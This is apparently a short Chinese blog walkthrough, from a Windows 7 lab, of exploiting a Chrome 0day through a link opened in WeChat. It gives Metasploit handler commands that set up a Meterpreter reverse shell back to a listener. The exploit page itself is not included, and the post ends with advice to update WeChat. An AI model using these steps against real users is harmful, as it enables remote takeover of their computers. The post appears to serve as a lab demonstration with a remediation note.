WX利用Chrome 0day

WX利用Chrome 0day

这里所用的环境

windows7,kali,外网服务器

首先,在外网部署利用代码,使用phpstudy作为中间件,一个index.html,一个js文件

image-20210418222145657

部署后,在靶机windows7装微信

准备就绪

kali:

打开msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.40.136
set lport 9999
run  //监听

windows7:

在微信打开发送的连接

image-20210418224240388

点击连接后木马上线

image-20210418224436604

接下来就可以控制该电脑

image-20210419000741558

打开对方的计算器

image-20210419000813555

修复建议

把微信更新到v3.2.1.143或者以上即可

posted @ 2021-04-19 00:20  小非鱼  阅读(14)  评论(0)    收藏  举报